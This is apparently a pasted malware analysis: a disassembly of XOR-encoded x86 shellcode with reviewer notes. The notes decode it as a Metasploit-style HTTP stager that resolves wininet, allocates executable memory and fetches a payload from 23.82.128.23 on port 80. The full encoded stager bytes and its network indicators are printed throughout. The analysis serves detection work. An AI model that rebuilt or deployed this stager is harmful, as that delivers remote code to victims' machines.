
Shellcode decode for /u/wolfblod

a guest
Aug 5th, 2019
  ; Offsets 0x00-0x8e.
  ; NOTE(review): this is a linear disassembly of the bytes as captured, i.e.
  ; still encoded. The mnemonics below ((bad), pop ss, popf, far jmp, ...) do
  ; not describe what would execute; read the hex column, not the instructions.
  ; The byte 0x16 appears wherever a zero byte would be expected (e.g. the run
  ; 16 16 16 on the first line), which suggests a single-byte XOR with key 0x16.
  ; This is an inference: the decoder stub is not part of this listing.
  ; Under that assumption:
  ;   0x00-0x06  ea fe 9f 16 16 16 76 -> fc e8 89 00 00 00 60
  ;              (cld; call +0x89, landing on offset 0x8f; pusha)
  ;   0x07-0x0f  9f f3 27 c4 72 9d 44 26 -> 89 e5 31 d2 64 8b 52 30
  ;              (mov ebp,esp; xor edx,edx; mov edx,fs:[edx+0x30])
  ; That opening matches the publicly documented hash-based API resolver
  ; found at the start of Metasploit-style stagers - confirm against a decoded
  ; copy before relying on it.
  ; Reading aid: 9d ("popf") is 8b (mov r32,r/m32) once decoded, and
  ; 16 ("push ss") is 00.
  1. 0: ea fe 9f 16 16 16 76 jmp 0x7616:0x16169ffe
  2. 7: 9f lahf
  3. 8: f3 27 repz daa
  4. a: c4 72 9d les esi,FWORD PTR [edx-0x63]
  5. d: 44 inc esp
  6. e: 26 9d es popf
  7. 10: 44 inc esp
  8. 11: 1a 9d 44 02 9d 64 sbb bl,BYTE PTR [ebp+0x649d0244]
  9. 17: 3e 19 a1 5c 30 27 e9 sbb DWORD PTR ds:[ecx-0x16d8cfa4],esp
  10. 1e: 27 daa
  11. 1f: d6 (bad)
  12. 20: ba 2a 77 6a 14 mov edx,0x146a772a
  13. 25: 3a 36 cmp dh,BYTE PTR [esi]
  14. 27: d7 xlat BYTE PTR ds:[ebx]
  15. 28: d9 1b fstp DWORD PTR [ebx]
  16. 2a: 17 pop ss
  17. 2b: d1 (bad)
  18. 2c: f4 hlt
  19. 2d: e6 44 out 0x44,al
  20. 2f: 41 inc ecx
  21. 30: 9d popf
  22. 31: 44 inc esp
  23. 32: 06 push es
  24. 33: 9d popf
  25. 34: 54 push esp
  26. 35: 2a 17 sub dl,BYTE PTR [edi]
  27. 37: c6 (bad)
  28. 38: 9d popf
  29. 39: 56 push esi
  30. 3a: 6e outs dx,BYTE PTR ds:[esi]
  31. 3b: 93 xchg ebx,eax
  32. 3c: d6 (bad)
  33. 3d: 62 5c 17 c6 bound ebx,QWORD PTR [edi+edx*1-0x3a]
  34. 41: 46 inc esi
  35. 42: 9d popf
  36. 43: 5e pop esi
  37. 44: 0e push cs
  38. 45: 9d popf
  39. 46: 4e dec esi
  40. 47: 36 17 ss pop ss
  41. 49: c5 f5 2a (bad)
  42. 4c: 5f pop edi
  43. 4d: 9d popf
  44. 4e: 22 9d 17 c0 27 e9 and bl,BYTE PTR [ebp-0x16d83fe9]
  45. 54: 27 daa
  46. 55: d6 (bad)
  47. 56: ba d7 d9 1b 17 mov edx,0x171bd9d7
  48. 5b: d1 2e shr DWORD PTR [esi],1
  49. 5d: f6 63 e2 mul BYTE PTR [ebx-0x1e]
  50. 60: 15 6b ee 2d 6b adc eax,0x6b2dee6b
  51. 65: 32 63 f4 xor ah,BYTE PTR [ebx-0xc]
  52. 68: 4e dec esi
  53. 69: 9d popf
  54. 6a: 4e dec esi
  55. 6b: 32 17 xor dl,BYTE PTR [edi]
  56. 6d: c5 70 9d lds esi,FWORD PTR [eax-0x63]
  57. 70: 1a 5d 9d sbb bl,BYTE PTR [ebp-0x63]
  58. 73: 4e dec esi
  59. 74: 0a 17 or dl,BYTE PTR [edi]
  60. 76: c5 9d 12 9d 17 c6 lds ebx,FWORD PTR [ebp-0x39e862ee]
  61. 7c: 9f lahf
  62. 7d: 52 push edx
  63. 7e: 32 32 xor dh,BYTE PTR [edx]
  64. 80: 4d dec ebp
  65. 81: 4d dec ebp
  66. 82: 77 4f ja 0xd3
  67. 84: 4c dec esp
  68. 85: 47 inc edi
  69. 86: e9 f6 4e 49 4c jmp 0x4c494f81
  70. 8b: 9d popf
  71. 8c: 04 fd add al,0xfd
  72. 8e: 90 nop
  ; Offsets 0x8f-0x13f.
  ; NOTE(review): the bytes are still encoded, so the mnemonics are not the
  ; real instructions. The hex column is consistent with a single-byte XOR,
  ; key 0x16 (inferred from 0x16 sitting where zero bytes belong - confirm).
  ; Under that assumption the pair `7e xx xx xx xx` + `e9 c3` recurs through
  ; this range and decodes to `68 imm32` + `ff d5` (push imm32; call ebp).
  ; The pushed constants look like API-name hashes handed to a resolver;
  ; the API names are not recoverable from this page alone.
  73. 8f: 4b dec ebx
  ; 0x90-0x99: 7e 78 73 62 16 / 7e 61 7f 78 7f -> 68 6e 65 74 00 / 68 77 69 6e 69,
  ; i.e. push "net\0" then push "wini": the ASCII string "wininet" built on
  ; the stack (decoded under the assumed key).
  74. 90: 7e 78 jle 0x10a
  75. 92: 73 62 jae 0xf6
  76. 94: 16 push ss
  77. 95: 7e 61 jle 0xf8
  78. 97: 7f 78 jg 0x111
  79. 99: 7f 42 jg 0xdd
  80. 9b: 7e 5a jle 0xf7
  81. 9d: 61 popa
  82. 9e: 30 11 xor BYTE PTR [ecx],dl
  83. a0: e9 c3 27 e9 41 jmp 0x41e92868
  84. a5: 41 inc ecx
  85. a6: 41 inc ecx
  86. a7: 41 inc ecx
  87. a8: 41 inc ecx
  88. a9: 7e 2c jle 0xd7
  89. ab: 40 inc eax
  90. ac: 6f outs dx,DWORD PTR ds:[esi]
  91. ad: b1 e9 mov cl,0xe9
  92. af: c3 ret
  93. b0: ff 92 16 16 16 4d call DWORD PTR [edx+0x4d161616]
  94. b6: 27 daa
  95. b7: df 47 47 fild WORD PTR [edi+0x47]
  96. ba: 7c 15 jl 0xd1
  97. bc: 47 inc edi
  98. bd: 47 inc edi
  ; 0xbe-0xc2: 7e 46 16 16 16 -> 68 50 00 00 00, push 0x50 (80 decimal).
  ; Presumably the TCP port argument of the connect call - confirm.
  99. be: 7e 46 jle 0x106
  100. c0: 16 push ss
  101. c1: 16 push ss
  102. c2: 16 push ss
  103. c3: 45 inc ebp
  104. c4: 46 inc esi
  105. c5: 7e 41 jle 0x108
  106. c7: 9f lahf
  107. c8: 89 d0 mov eax,edx
  108. ca: e9 c3 fd 66 4d jmp 0x4d66fe92
  109. cf: 27 daa
  110. d0: c4 44 7e 16 les eax,FWORD PTR [esi+edi*2+0x16]
  111. d4: 14 56 adc al,0x56
  112. d6: 92 xchg edx,eax
  113. d7: 44 inc esp
  114. d8: 44 inc esp
  115. d9: 44 inc esp
  116. da: 45 inc ebp
  117. db: 44 inc esp
  118. dc: 46 inc esi
  119. dd: 7e fd jle 0xdc
  120. df: 43 inc ebx
  121. e0: 38 2d e9 c3 9f d0 cmp BYTE PTR ds:0xd09fc3e9,ch
  122. e6: 95 xchg ebp,eax
  123. e7: d5 46 aad 0x46
  124. e9: 27 daa
  125. ea: e9 41 41 7c e9 jmp 0xe97c4230
  126. ef: 45 inc ebp
  127. f0: 40 inc eax
  128. f1: 7e 3b jle 0x12e
  129. f3: 10 0e adc BYTE PTR [esi],cl
  130. f5: 6d ins DWORD PTR es:[edi],dx
  131. f6: e9 c3 93 d6 19 jmp 0x19d694be
  132. fb: 92 xchg edx,eax
  133. fc: d5 17 aad 0x17
  134. fe: 16 push ss
  135. ff: 16 push ss
  136. 100: 27 daa
  137. 101: e9 93 e0 62 12 jmp 0x1262e199
  138. 106: 9f lahf
  139. 107: ef out dx,eax
  140. 108: fd std
  141. 109: 1f pop ds
  142. 10a: 7e bc jle 0xc8
  143. 10c: d3 (bad)
  144. 10d: f4 hlt
  145. 10e: 4b dec ebx
  146. 10f: e9 c3 9f d7 7e jmp 0x7ed7a0d7
  147. 114: 53 push ebx
  148. 115: 37 aaa
  149. 116: 48 dec eax
  150. 117: 27 daa
  151. 118: e9 c3 27 e9 41 jmp 0x41e928e0
  152. 11d: 7c 11 jl 0x130
  153. 11f: 47 inc edi
  154. 120: 40 inc eax
  155. 121: 46 inc esi
  156. 122: 7e a1 jle 0xc5
  157. 124: 41 inc ecx
  158. 125: f6 1d e9 c3 a9 16 neg BYTE PTR ds:0x16a9c3e9
  159. 12b: 39 16 cmp DWORD PTR [esi],edx
  160. 12d: 16 push ss
  161. 12e: 2f das
  162. 12f: d1 62 a1 shl DWORD PTR [edx-0x5f],1
  163. 132: 27 daa
  164. 133: e9 ff 87 17 16 jmp 0x16178937
  165. 138: 16 push ss
  166. 139: ff (bad)
  167. 13a: df 17 fist WORD PTR [edi]
  168. 13c: 16 push ss
  169. 13d: 16 push ss
  170. 13e: fe (bad)
  171. 13f: 9d popf
  ; Offsets 0x140-0x1f1: embedded data, not instructions.
  ; NOTE(review): objdump swept straight through this range, so every mnemonic
  ; here is an artefact. The bytes are still encoded; the readings below
  ; assume a single-byte XOR with key 0x16 (inferred, confirm on a decoded copy).
  ;   0x143-0x148  39 6f 24 79 54 16 -> ASCII "/y2oB" + NUL; looks like the
  ;                request path.
  ;   0x149-0x192  no printable text under that key; possibly padding.
  ;   0x193-0x1f1  decodes to the header line
  ;                "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0;
  ;                Trident/5.0; BOIE9;ENUSMSNIP)" followed by CR LF NUL.
  ; The path and User-Agent are the network-visible values a proxy or IDS rule
  ; could match on; re-derive them from the hex before using them as indicators.
  172. 140: e9 e9 e9 39 6f jmp 0x6f39eb2e
  173. 145: 24 79 and al,0x79
  174. 147: 54 push esp
  175. 148: 16 push ss
  176. 149: f8 clc
  177. 14a: 67 73 1c addr16 jae 0x169
  178. 14d: 24 39 and al,0x39
  179. 14f: 5b pop ebx
  180. 150: 09 98 8d 86 3d 67 or DWORD PTR [eax+0x673d868d],ebx
  181. 156: ab stos DWORD PTR es:[edi],eax
  182. 157: 5a pop edx
  183. 158: 03 b3 2e 81 d7 23 add esi,DWORD PTR [ebx+0x23d7812e]
  184. 15e: 3f aas
  185. 15f: 7b 01 jnp 0x162
  186. 161: 37 aaa
  187. 162: 6a 1f push 0x1f
  188. 164: 73 95 jae 0xfb
  189. 166: c0 22 3f shl BYTE PTR [edx],0x3f
  190. 169: 8f (bad)
  191. 16a: 9d popf
  192. 16b: 4a dec edx
  193. 16c: 28 ef sub bh,ch
  194. 16e: bd 1d e2 87 cd mov ebp,0xcd87e21d
  195. 173: 9d popf
  196. 174: 4c dec esp
  197. 175: 7f bd jg 0x134
  198. 177: 9c pushf
  199. 178: 65 88 f6 gs mov dh,dh
  200. 17b: ec in al,dx
  201. 17c: de 43 66 fiadd WORD PTR [ebx+0x66]
  202. 17f: bd fb 38 47 c5 mov ebp,0xc54738fb
  203. 184: b5 94 mov ch,0x94
  204. 186: 48 dec eax
  205. 187: b5 9c mov ch,0x9c
  206. 189: c2 f5 92 ret 0x92f5
  207. 18c: 4c dec esp
  208. 18d: 17 pop ss
  209. 18e: b7 e4 mov bh,0xe4
  210. 190: df 54 16 43 fist WORD PTR [esi+edx*1+0x43]
  211. 194: 65 73 64 gs jae 0x1fb
  212. 197: 3b 57 71 cmp edx,DWORD PTR [edi+0x71]
  213. 19a: 73 78 jae 0x214
  214. 19c: 62 2c 36 bound ebp,QWORD PTR [esi+esi*1]
  215. 19f: 5b pop ebx
  216. 1a0: 79 6c jns 0x20e
  217. 1a2: 7f 7a jg 0x21e
  218. 1a4: 7a 77 jp 0x21d
  219. 1a6: 39 23 cmp DWORD PTR [ebx],esp
  220. 1a8: 38 26 cmp BYTE PTR [esi],ah
  221. 1aa: 36 3e 75 79 ss ds jne 0x227
  222. 1ae: 7b 66 jnp 0x216
  223. 1b0: 77 62 ja 0x214
  224. 1b2: 7f 74 jg 0x228
  225. 1b4: 7a 73 jp 0x229
  226. 1b6: 2d 36 5b 45 5f sub eax,0x5f455b36
  227. 1bb: 53 push ebx
  228. 1bc: 36 2f ss das
  229. 1be: 38 26 cmp BYTE PTR [esi],ah
  230. 1c0: 2d 36 41 7f 78 sub eax,0x787f4136
  231. 1c5: 72 79 jb 0x240
  232. 1c7: 61 popa
  233. 1c8: 65 36 58 gs ss pop eax
  234. 1cb: 42 inc edx
  235. 1cc: 36 20 38 and BYTE PTR ss:[eax],bh
  236. 1cf: 26 2d 36 42 64 7f es sub eax,0x7f644236
  237. 1d5: 72 73 jb 0x24a
  238. 1d7: 78 62 js 0x23b
  239. 1d9: 39 23 cmp DWORD PTR [ebx],esp
  240. 1db: 38 26 cmp BYTE PTR [esi],ah
  241. 1dd: 2d 36 54 59 5f sub eax,0x5f595436
  242. 1e2: 53 push ebx
  243. 1e3: 2f das
  244. 1e4: 2d 53 58 43 45 sub eax,0x45435853
  245. 1e9: 5b pop ebx
  246. 1ea: 45 inc ebp
  247. 1eb: 58 pop eax
  248. 1ec: 5f pop edi
  249. 1ed: 46 inc esi
  250. 1ee: 3f aas
  251. 1ef: 1b 1c 16 sbb ebx,DWORD PTR [esi+edx*1]
  ; Offsets 0x1f2-0x2c2.
  ; NOTE(review): the bytes are still encoded and were disassembled linearly,
  ; so the mnemonics are artefacts. Assuming the single-byte XOR key 0x16
  ; suggested by the rest of the listing, the bytes sampled in this range give
  ; neither printable text nor a recognisable instruction sequence. Possibly
  ; padding that follows the header string ending at 0x1f1 - confirm on a
  ; decoded copy before drawing conclusions from anything in this range.
  252. 1f2: b4 85 mov ah,0x85
  253. 1f4: 54 push esp
  254. 1f5: 63 f2 arpl dx,si
  255. 1f7: f0 dc 9c 39 56 c2 41 lock fcomp QWORD PTR [ecx+edi*1+0x5341c256]
  256. 1fe: 53
  257. 1ff: 1e push ds
  258. 200: 4e dec esi
  259. 201: 4d dec ebp
  260. 202: fe (bad)
  261. 203: 2f das
  262. 204: 80 19 17 sbb BYTE PTR [ecx],0x17
  263. 207: 01 37 add DWORD PTR [edi],esi
  264. 209: f3 e5 08 repz in eax,0x8
  265. 20c: eb 14 jmp 0x222
  266. 20e: af scas eax,DWORD PTR es:[edi]
  267. 20f: 41 inc ecx
  268. 210: 80 78 7f 0f cmp BYTE PTR [eax+0x7f],0xf
  269. 214: c7 86 c6 b9 a1 a6 3e mov DWORD PTR [esi-0x595e463a],0x1375a13e
  270. 21b: a1 75 13
  271. 21e: 1e push ds
  272. 21f: 94 xchg esp,eax
  273. 220: db 2d fb fe 6a 04 fld TBYTE PTR ds:0x46afefb
  274. 226: 1b a4 36 6b b1 a6 d8 sbb esp,DWORD PTR [esi+esi*1-0x27594e95]
  275. 22d: 0a 25 47 5c 2b 5d or ah,BYTE PTR ds:0x5d2b5c47
  276. 233: 48 dec eax
  277. 234: 41 inc ecx
  278. 235: 79 5c jns 0x293
  279. 237: 9f lahf
  280. 238: a5 movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
  281. 239: 43 inc ebx
  282. 23a: 14 f9 adc al,0xf9
  283. 23c: 50 push eax
  284. 23d: 62 8b ad 28 8e 4c bound ecx,QWORD PTR [ebx+0x4c8e28ad]
  285. 243: 6f outs dx,DWORD PTR ds:[esi]
  286. 244: d7 xlat BYTE PTR ds:[ebx]
  287. 245: 41 inc ecx
  288. 246: fd std
  289. 247: 4d dec ebp
  290. 248: 03 29 add ebp,DWORD PTR [ecx]
  291. 24a: 71 58 jno 0x2a4
  292. 24c: b8 83 65 e0 cd mov eax,0xcde06583
  293. 251: 1f pop ds
  294. 252: c7 (bad)
  295. 253: e6 66 out 0x66,al
  296. 255: fe 08 dec BYTE PTR [eax]
  297. 257: 94 xchg esp,eax
  298. 258: 4a dec edx
  299. 259: 97 xchg edi,eax
  300. 25a: 88 a2 df 44 a1 c1 mov BYTE PTR [edx-0x3e5ebb21],ah
  301. 260: 9d popf
  302. 261: fc cld
  303. 262: df 24 3c fbld TBYTE PTR [esp+edi*1]
  304. 265: cb retf
  305. 266: 48 dec eax
  306. 267: 3b 7f 75 cmp edi,DWORD PTR [edi+0x75]
  307. 26a: ae scas al,BYTE PTR es:[edi]
  308. 26b: d9 60 5f fldenv [eax+0x5f]
  309. 26e: ba 96 9c bc e5 mov edx,0xe5bc9c96
  310. 273: 38 24 46 cmp BYTE PTR [esi+eax*2],ah
  311. 276: 39 49 1f cmp DWORD PTR [ecx+0x1f],ecx
  312. 279: dd c6 ffree st(6)
  313. 27b: 9e sahf
  314. 27c: 51 push ecx
  315. 27d: b9 b5 52 f0 82 mov ecx,0x82f052b5
  316. 282: 81 24 46 e7 2d 88 39 and DWORD PTR [esi+eax*2],0x39882de7
  317. 289: df a0 83 85 0e ba fbld TBYTE PTR [eax-0x45f17a7d]
  318. 28f: eb 66 jmp 0x2f7
  319. 291: 88 87 ac f1 67 d1 mov BYTE PTR [edi-0x2e980e54],al
  320. 297: 28 a4 31 8c b8 f2 5e sub BYTE PTR [ecx+esi*1+0x5ef2b88c],ah
  321. 29e: e4 e2 in al,0xe2
  322. 2a0: c9 leave
  323. 2a1: cf iret
  324. 2a2: 24 55 and al,0x55
  325. 2a4: 5b pop ebx
  326. 2a5: bc 90 cb 90 5a mov esp,0x5a90cb90
  327. 2aa: cd 7d int 0x7d
  328. 2ac: 0e push cs
  329. 2ad: 69 6a 48 e2 4f 64 54 imul ebp,DWORD PTR [edx+0x48],0x54644fe2
  330. 2b4: eb 32 jmp 0x2e8
  331. 2b6: 59 pop ecx
  332. 2b7: d7 xlat BYTE PTR ds:[ebx]
  333. 2b8: 3d 44 d3 93 c6 cmp eax,0xc693d344
  334. 2bd: 6a c8 push 0xffffffc8
  335. 2bf: d7 xlat BYTE PTR ds:[ebx]
  336. 2c0: 0e push cs
  337. 2c1: 8d 16 lea edx,[esi]
  ; Offsets 0x2c3-0x31c: final code run plus a trailing string.
  ; NOTE(review): the bytes are still encoded; the mnemonics are artefacts of a
  ; linear sweep. Readings below assume a single-byte XOR with key 0x16
  ; (inferred from 0x16 standing in for zero bytes - confirm).
  ; The `7e xx xx xx xx` + `e9 c3` pairs decode to push imm32; call ebp, and
  ; the immediates look like API-name hashes.
  338. 2c3: 7e e6 jle 0x2ab
  339. 2c5: a3 b4 40 e9 c3 mov ds:0xc3e940b4,eax
  ; 0x2ca-0x2d5: 7c 56 / 7e 16 06 16 16 / 7e 16 16 56 16 ->
  ; push 0x40; push 0x1000; push 0x400000. Presumably protection 0x40
  ; (PAGE_EXECUTE_READWRITE), type 0x1000 (MEM_COMMIT) and size 0x400000 for
  ; a memory allocation call - confirm. A writable+executable allocation
  ; that is then filled from the network is a behaviour EDR rules can key on.
  340. 2ca: 7c 56 jl 0x322
  341. 2cc: 7e 16 jle 0x2e4
  342. 2ce: 06 push es
  343. 2cf: 16 push ss
  344. 2d0: 16 push ss
  345. 2d1: 7e 16 jle 0x2e9
  346. 2d3: 16 push ss
  347. 2d4: 56 push esi
  348. 2d5: 16 push ss
  349. 2d6: 41 inc ecx
  350. 2d7: 7e 4e jle 0x327
  351. 2d9: b2 45 mov dl,0x45
  352. 2db: f3 e9 c3 85 af 16 repz jmp 0x16af88a4
  353. 2e1: 16 push ss
  354. 2e2: 16 push ss
  355. 2e3: 16 push ss
  356. 2e4: 17 pop ss
  357. 2e5: cf iret
  358. 2e6: 47 inc edi
  359. 2e7: 45 inc ebp
  360. 2e8: 9f lahf
  361. 2e9: f1 icebp
  362. 2ea: 41 inc ecx
  363. 2eb: 7e 16 jle 0x303
  364. 2ed: 36 16 ss push ss
  365. 2ef: 16 push ss
  366. 2f0: 45 inc ebp
  367. 2f1: 40 inc eax
  368. 2f2: 7e 04 jle 0x2f8
  369. 2f4: 80 9f f4 e9 c3 93 d6 sbb BYTE PTR [edi-0x6c3c160c],0xd6
  370. 2fb: 62 (bad)
  371. 2fc: d0 9d 11 17 d5 93 rcr BYTE PTR [ebp-0x6c2ae8ef],1
  372. 302: d6 (bad)
  373. 303: 63 f3 arpl bx,si
  374. 305: 4e dec esi
  375. 306: d5 fe aad 0xfe
  ; 0x307-0x30b: fe bf eb e9 e9 -> e8 a9 fd ff ff, a call back to offset 0xb5;
  ; the bytes after it are data, not code.
  ; 0x30c-0x317: 24 25 38 2e 24 38 27 24 2e 38 24 25 -> ASCII "23.82.128.23",
  ; followed by NUL bytes (0x318-0x31b). Looks like the remote host the stager
  ; contacts; re-derive from the hex before treating it as an indicator.
  376. 308: bf eb e9 e9 24 mov edi,0x24e9e9eb
  377. 30d: 25 38 2e 24 38 and eax,0x38242e38
  378. 312: 27 daa
  379. 313: 24 2e and al,0x2e
  380. 315: 38 24 25 16 16 16 16 cmp BYTE PTR [eiz*1+0x16161616],ah
  381. 31c: 15 .byte 0x15